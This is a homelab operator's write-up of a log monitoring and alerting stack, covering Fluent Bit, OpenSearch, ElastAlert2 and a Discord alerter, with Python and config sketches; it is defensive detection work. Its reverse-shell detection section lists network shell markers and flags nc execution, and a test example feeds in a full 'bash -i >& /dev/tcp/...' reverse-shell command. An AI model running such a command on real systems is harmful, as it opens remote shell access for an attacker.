Homelab Monitoring and Alerting Stack

Scope

This page documents the monitoring and alerting stack I run on my Proxmox homelab: design choices, architecture, log sources, and how alerts move from collection to notification. It focuses on how the system is built and operated, not on reproducing every config file line by line.

Passwords, webhook URLs, internal LAN maps, container IDs, and full configuration files are intentionally omitted or replaced by placeholders. Examples use fictional hostnames (git.example.com, edge-waf-01) and documentation-only addressing (10.0.10.0/24, 203.0.113.50). Nothing in these examples describes my live infrastructure.

Why not Wazuh

I evaluated Wazuh as a full SIEM and chose to build something lighter instead. The reasons are practical, not ideological:

Resource cost: Wazuh is heavy for a single-operator homelab. Indexer, manager, and agents add ongoing CPU, RAM, and disk overhead I did not need.
CVE correlation: I do not rely on built-in vulnerability scanning in this stack. Patch management and service updates are handled separately.
Rule fit: Default Wazuh rules target generic enterprise patterns. My environment is Proxmox LXCs and Docker apps, among other things, so most default alerts would be noise.
Custom work anyway: Useful alerting still required writing or tuning rules. If I am going to maintain rules by hand, I prefer a pipeline where every alert has a clear, homelab-specific purpose.

The result is a smaller stack: Fluent Bit agents, OpenSearch for storage and search, ElastAlert2 for rule evaluation, and Discord for notifications. Less platform, more signal.

Design principles

Collect once, query everywhere: all nodes ship logs to one OpenSearch cluster.
Actionable alerts only: SSH access, WAF blocks on public vhosts, reverse shell indicators, unauthorized proxies, and stack health, not every log line.
Edge-first security: internet-exposed services sit behind nginx, ModSecurity (OWASP CRS), and fail2ban. Those logs feed the same pipeline.
Lightweight agents: Fluent Bit on the hypervisor and on each monitored LXC. No heavy agent framework.
Meta-monitoring: a watchdog timer verifies OpenSearch, ElastAlert2, and Fluent Bit itself, so the monitoring stack cannot fail silently.
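
The meta-monitoring idea can be sketched as a small check runner. This is an illustration under assumptions, not the deployed watchdog: run_checks and the probe names are hypothetical, and real probes would query the OpenSearch health API or ask systemd whether a unit is active.

```python
from typing import Callable, Dict, List


def run_checks(probes: Dict[str, Callable[[], bool]]) -> List[str]:
    """Run each probe and return the names of components that look down.

    A probe that raises counts as a failure, so a crashed check
    cannot hide a crashed component.
    """
    failed = []
    for name, probe in probes.items():
        try:
            healthy = bool(probe())
        except Exception:
            healthy = False
        if not healthy:
            failed.append(name)
    return failed


def _broken_probe() -> bool:
    # Simulates a probe whose target refuses the connection.
    raise ConnectionError("connection refused")


# Hypothetical probes; stand-ins for real HTTP or systemd checks.
example_probes = {
    "opensearch": lambda: True,
    "elastalert2": lambda: False,
    "fluent-bit": _broken_probe,
}
down = run_checks(example_probes)
```

Anything returned in down would be reported as a stack health alert. Sending that alert over a path that does not depend on the failed component is the important design choice.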

Architecture

Public HTTP(S) traffic hits an edge reverse proxy with a WAF. Application workloads run on separate LXCs (Docker or systemd). Every monitored node runs Fluent Bit and forwards enriched events to a central OpenSearch instance. ElastAlert2 polls OpenSearch and triggers a custom Discord alerter when rules match.

Internet (203.0.113.50)
        |
        v
+------------------+
| edge-waf-01      |  nginx + ModSecurity + fail2ban
| (public vhosts)  |
+--------+---------+
         | reverse proxy
         v
+------------------+
| app-node-01      |  Docker / systemd (Forgejo-like apps)
| app-node-02      |  other self-hosted services
+------------------+

Proxmox host + monitored LXCs
        |
        |  Fluent Bit (journald, docker, nginx/modsec, audit)
        v
+------------------+
| monitoring-core  |  OpenSearch + Dashboards (Docker)
+--------+---------+
         |
         +--- OpenSearch Dashboards  (search / Discover)
         |
         +--- ElastAlert2             (YAML rules, realert throttling)
         |         |
         |         v
         |    Discord alerter         (REDACTED webhook)
         |
         +--- watchdog timer          (stack health alerts)

Separate: pve-notifier on hypervisor -> Telegram (Proxmox login events)

Stack components

Fluent Bit

Runs on the Proxmox host and on each monitored LXC. Tails journald, Docker JSON logs, nginx and ModSecurity files on edge nodes, and audit events where available. Lua filters add readable summary fields, event_type, and security tags such as web_exploit_event or reverse_shell_event.

OpenSearch + Dashboards

Central log store on monitoring-core. Daily indices (logs-YYYY.MM.DD), authenticated API, and a saved Discover view for day-to-day investigation. Grafana on the same node handles metrics - logs and metrics stay separate by design.
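
For tooling that needs to target a specific day, the daily index name can be derived from an event timestamp. A minimal sketch, assuming index names are computed in UTC; daily_index is a hypothetical helper, not part of any library.

```python
from datetime import datetime, timedelta, timezone


def daily_index(ts: datetime, prefix: str = "logs") -> str:
    """Return the daily index name for a timezone-aware timestamp."""
    # Convert to UTC first so events near midnight land in a consistent index.
    return f"{prefix}-{ts.astimezone(timezone.utc):%Y.%m.%d}"


# An event logged at 23:30 in UTC-5 already belongs to the next day in UTC.
late_evening = datetime(2024, 5, 1, 23, 30, tzinfo=timezone(timedelta(hours=-5)))
index_name = daily_index(late_evening)
```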

ElastAlert2

Evaluates YAML rules against OpenSearch every minute. Rules use the any and frequency types, with repeat alerts throttled via realert. Severity is encoded in the rule title (for example [critical], [high]) and parsed by the alerter script.
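
Parsing the severity tag out of a rule title could look roughly like this. It is a sketch, not the deployed alerter: parse_severity is a hypothetical name, and the medium and low levels are assumptions beyond the critical, high, and info levels this page mentions.

```python
import re
from typing import Tuple

# critical, high, and info appear on this page; medium and low are assumed.
SEVERITIES = ("critical", "high", "medium", "low", "info")
_TAG = re.compile(r"\[(\w+)\]")


def parse_severity(title: str, default: str = "info") -> Tuple[str, str]:
    """Split a title like 'Web Exploit Blocked [high]' into (name, severity)."""
    for match in _TAG.finditer(title):
        tag = match.group(1).lower()
        if tag in SEVERITIES:
            # Remove the tag and collapse any leftover double spaces.
            name = title[:match.start()] + title[match.end():]
            return " ".join(name.split()), tag
    # No recognized tag: keep the title and fall back to the default level.
    return title.strip(), default


name, severity = parse_severity("Web Exploit Blocked [high]")
```

Falling back to a default level instead of raising keeps a mistyped title from suppressing the notification entirely.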

Discord alerter

Small Python script invoked by ElastAlert2. Builds a colored embed (host, severity, summary, timestamp) and a link back to OpenSearch Dashboards filtered on the document id. Webhook URL is stored only on the server - never published.
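
The embed construction can be sketched as a pure function that returns the JSON body for a Discord webhook. The color palette, field layout, and build_payload name are assumptions for illustration. The Dashboards link is passed in as an opaque string because its exact format is not documented here.

```python
from typing import Any, Dict

# Embed colors are 24-bit RGB integers; this palette is an assumption.
SEVERITY_COLORS = {"critical": 0xE74C3C, "high": 0xE67E22, "info": 0x3498DB}
DEFAULT_COLOR = 0x95A5A6


def build_payload(title: str, severity: str, host: str, summary: str,
                  timestamp: str, link: str) -> Dict[str, Any]:
    """Build a webhook body with one embed; timestamp must be ISO 8601."""
    return {
        "embeds": [{
            "title": f"[{severity.upper()}] {title}",
            "description": summary,
            "url": link,
            "color": SEVERITY_COLORS.get(severity, DEFAULT_COLOR),
            "timestamp": timestamp,
            "fields": [
                {"name": "Host", "value": host, "inline": True},
                {"name": "Severity", "value": severity, "inline": True},
            ],
        }]
    }


payload = build_payload(
    "Web Exploit Blocked", "high", "edge-waf-01",
    "Exploit blocked WAF rule=932160 uri=/api/exec",
    "2024-05-01T12:00:00Z", "https://dashboards.example.com/placeholder",
)
```

The script would then POST this dictionary as JSON to the webhook URL read from the server-side env file. Keeping payload construction separate from the network call makes it testable without a webhook.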

Complementary control-plane alert: pve-notifier tails Proxmox login events and pushes Telegram notifications. It predates this log stack and still covers hypervisor access independently.

What gets collected

Edge / internet-facing: nginx access and error logs, ModSecurity audit lines (blocks and high-score anomalies), fail2ban ban events.
Identity / access: SSH accepted and failed logins via systemd journal on all monitored nodes.
Applications: Docker stdout/stderr on app LXCs (Forgejo, RSS reader, paste bin, media server, and similar).
Host security: auditd on the Proxmox hypervisor (exec of suspicious binaries, sudo, critical file writes). Limited inside unprivileged LXCs.
Custom detections (Lua): unauthorized reverse proxy or tunnel startup, WAF exploit tagging, reverse shell pattern matching in audit and Docker logs.
Environment-specific: optional inputs for routing daemons or game servers on dedicated nodes - same pipeline, different rules.

Alert categories

Category	Example trigger	Severity
Access	SSH login success	critical
Access	SSH brute force (5 failures / 5 min)	high
Web security	WAF blocks RCE or injection on public vhosts	high
Compromise	Reverse shell pattern on an app node	critical
Posture	Unauthorized reverse proxy or tunnel binary	high
Operations	Monitoring stack component down (watchdog)	critical
Informational	Game server player join (optional rule)	info
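
The brute-force threshold in the table (5 failures in 5 minutes) is the kind of condition a frequency rule evaluates. The sliding-window sketch below shows the idea only; it is not ElastAlert2's implementation. FailureWindow is a hypothetical class, keying on source IP is an assumption, and events are assumed to arrive in time order.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


class FailureWindow:
    """Count failed logins per key inside a sliding time window."""

    def __init__(self, threshold: int = 5, window: timedelta = timedelta(minutes=5)):
        self.threshold = threshold
        self.window = window
        self._events = defaultdict(deque)

    def add(self, key: str, ts: datetime) -> bool:
        """Record one failure; return True when the threshold is reached."""
        events = self._events[key]
        events.append(ts)
        # Drop failures that fell out of the window.
        while events and ts - events[0] > self.window:
            events.popleft()
        return len(events) >= self.threshold


start = datetime(2024, 1, 1, 12, 0)
burst = FailureWindow()
# Five failures one minute apart: only the fifth reaches the threshold.
fired = [burst.add("198.51.100.42", start + timedelta(minutes=i)) for i in range(5)]
```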

Rules are YAML files deployed alongside ElastAlert2. Each rule defines a query, optional grouping (query_key), and minimum time between repeat alerts (realert).
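
How realert and query_key interact can be illustrated with a small throttle: after an alert fires for a given key, repeats for that key are suppressed until the interval has passed. This is a sketch of the behavior, not ElastAlert2's code, and the Realert class is a hypothetical name.

```python
from datetime import datetime, timedelta
from typing import Dict


class Realert:
    """Suppress repeat alerts per key for a fixed interval."""

    def __init__(self, interval: timedelta):
        self.interval = interval
        self._last_sent: Dict[str, datetime] = {}

    def should_send(self, key: str, now: datetime) -> bool:
        last = self._last_sent.get(key)
        if last is not None and now - last < self.interval:
            return False  # still inside the quiet period for this key
        self._last_sent[key] = now
        return True


t0 = datetime(2024, 1, 1, 12, 0)
throttle = Realert(timedelta(minutes=10))
first = throttle.should_send("edge-waf-01", t0)
repeat = throttle.should_send("edge-waf-01", t0 + timedelta(minutes=5))
other_host = throttle.should_send("app-node-01", t0 + timedelta(minutes=5))
```

Grouping by host in this way means a noisy node cannot silence alerts from a quiet one.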

Example alert walkthrough

The scenarios below are fictional but structurally identical to how real events flow through the stack. Hostnames, IPs, and URIs are placeholders.

Scenario A - exploit blocked at the edge (high)

Client 198.51.100.42 sends POST /api/exec with shell metacharacters to git.example.com (hosted behind edge-waf-01).
nginx hands the request to ModSecurity (OWASP CRS) for inspection. Rule 932160 (remote command execution family) matches, and ModSecurity returns HTTP 403.
A single-line ModSecurity audit entry is appended to the local audit log on edge-waf-01.
Fluent Bit tails that file. A Lua filter parses the rule id and sets web_exploit_event: true, internet_facing: true, and a human-readable summary.
The event is indexed in OpenSearch on monitoring-core within seconds.
ElastAlert2 rule web_exploit_blocked matches on the next evaluation cycle (about one minute).
The Discord alerter posts an embed: severity HIGH, host edge-waf-01, summary text, and a Discover link filtered on the document id.

Sample log line (redacted):

ModSecurity: Access denied with code 403 (phase 2). [id "932160"] [msg "Remote Command Execution: Unix Shell Code Found"] [hostname "git.example.com"] [uri "/api/exec"] [unique_id "REDACTED"]
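
The parsing step that the Lua filter performs on a line like this can be approximated in Python. The sketch below is an illustration rather than a port of the real filter: tag_modsec_line and the regular expression are assumptions, while the field names and the 932/933/934 prefixes follow this page.

```python
import re
from typing import Dict, Optional

# Matches bracketed pairs such as [id "932160"] or [uri "/api/exec"].
_FIELD = re.compile(r'\[(\w+) "([^"]*)"\]')
RCE_PREFIXES = ("932", "933", "934")


def tag_modsec_line(line: str) -> Optional[Dict[str, object]]:
    """Return enrichment fields for a blocked RCE-family request, else None."""
    if "Access denied" not in line:
        return None
    fields = dict(_FIELD.findall(line))
    rule_id = fields.get("id", "")
    if not rule_id.startswith(RCE_PREFIXES):
        return None
    uri = fields.get("uri", "-")
    return {
        "web_exploit_event": True,
        "internet_facing": True,
        "rule_id": rule_id,
        "summary": f"Exploit blocked WAF rule={rule_id} uri={uri}",
    }


sample = ('ModSecurity: Access denied with code 403 (phase 2). [id "932160"] '
          '[msg "Remote Command Execution: Unix Shell Code Found"] '
          '[hostname "git.example.com"] [uri "/api/exec"] [unique_id "REDACTED"]')
tags = tag_modsec_line(sample)
```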

Matching ElastAlert2 rule excerpt:

name: Web Exploit Blocked
type: any
index: logs-*
filter:
  - query:
      query_string:
        query: 'web_exploit_event:true AND internet_facing:true'
realert:
  minutes: 10
alert:
  - command
command: ["/opt/elastalert/discord_alert.py", "Web Exploit Blocked [high]", "{host}", "{ctid}", "{summary}", "{@timestamp}", "{_id}"]

Scenario B - post-exploitation signal (critical)

If a payload bypassed the WAF or reached an application backend directly (for example via an unsegmented internal path), a successful compromise might show up as execution patterns rather than a blocked HTTP request:

Audit or Docker logs on app-node-01 contain strings such as /dev/tcp/, bash -i, or nc -e.
Lua tagging sets reverse_shell_event: true.
ElastAlert2 rule reverse_shell_detected fires at critical severity.
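
The tagging step in Scenario B amounts to substring matching on the log text. A minimal Python sketch, assuming the message lives in a field named log (a hypothetical choice) and using only the three marker strings listed above; tag_reverse_shell is an illustrative name, and the real filter is written in Lua.

```python
from typing import Any, Dict

REVERSE_SHELL_MARKERS = ("/dev/tcp/", "bash -i", "nc -e")


def tag_reverse_shell(record: Dict[str, Any], field: str = "log") -> Dict[str, Any]:
    """Return a copy of the record, tagged if its text contains a marker."""
    text = str(record.get(field, ""))
    hits = [marker for marker in REVERSE_SHELL_MARKERS if marker in text]
    tagged = dict(record)
    if hits:
        tagged["reverse_shell_event"] = True
        tagged["summary"] = "Reverse shell pattern: " + ", ".join(hits)
    return tagged


suspicious = tag_reverse_shell({"log": "bash -i >& /dev/tcp/198.51.100.42/4444 0>&1"})
benign = tag_reverse_shell({"log": "GET /index.html 200"})
```

Plain substring checks are cheap but prone to false positives, for example documentation or scripts that mention these strings, which is one reason the matching rule is throttled and reviewed by hand.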

Scenario A is prevention at the edge. Scenario B is detection after access. Both are needed because no WAF is perfect and not all traffic necessarily passes through the edge.

Configuration excerpts

Full configs live on the hypervisor and are not published. The snippets below show shape only.

Fluent Bit output (credentials via environment file on each node):

[OUTPUT]
    Name                  opensearch
    Match                 *
    Host                  monitoring-core.internal
    Port                  9200
    HTTP_User             ${OPENSEARCH_USER}
    HTTP_Passwd           REDACTED
    Logstash_Format       On
    Logstash_Prefix       logs

Audit rule example (hypervisor):

-a always,exit -F arch=b64 -S execve -F path=/usr/bin/nc -k suspicious_binaries

Lua tagging concept (web exploit):

-- On ModSecurity "Access denied" + RCE rule id prefix 932/933/934:
record["web_exploit_event"] = "true"
record["internet_facing"] = "true"
record["summary"] = "Exploit blocked WAF rule=" .. rule_id .. " uri=" .. uri

OpenSearch requires authentication. Dashboards, ElastAlert2, Fluent Bit, and the watchdog each read credentials from a root-only env file (chmod 600) on the node where they run.
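
A script that consumes such an env file can refuse to run when the permissions are looser than expected. The loader below is a sketch under assumptions: load_env_file is a hypothetical helper, the file is assumed to hold simple KEY=VALUE lines, and OPENSEARCH_PASSWORD in the usage note is a placeholder variable name.

```python
import os
import stat
from typing import Dict


def load_env_file(path: str) -> Dict[str, str]:
    """Parse KEY=VALUE lines, refusing files readable by group or others."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:
        raise PermissionError(f"{path} is too permissive (mode {mode:o})")
    values: Dict[str, str] = {}
    with open(path, encoding="utf-8") as handle:
        for raw in handle:
            line = raw.strip()
            # Skip blanks, comments, and anything that is not an assignment.
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, _, value = line.partition("=")
            values[key.strip()] = value.strip().strip('"')
    return values
```

A caller would then read, for example, the OPENSEARCH_USER and OPENSEARCH_PASSWORD entries from the returned dictionary instead of hardcoding them.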

Trade-offs and limits

auditd in LXCs: unprivileged containers often cannot load audit rules reliably. Reverse shell detection is strongest on the hypervisor and via Docker logs on app nodes.
WAF coverage: ModSecurity only sees traffic that passes through the edge proxy. Backends reachable without the WAF are a separate hardening topic.
Rule maintenance: custom YAML and Lua require ongoing care. That is intentional - I prefer explicit rules over opaque defaults.
Alert channel: Discord is for operational notification, not incident ticketing or long-term retention.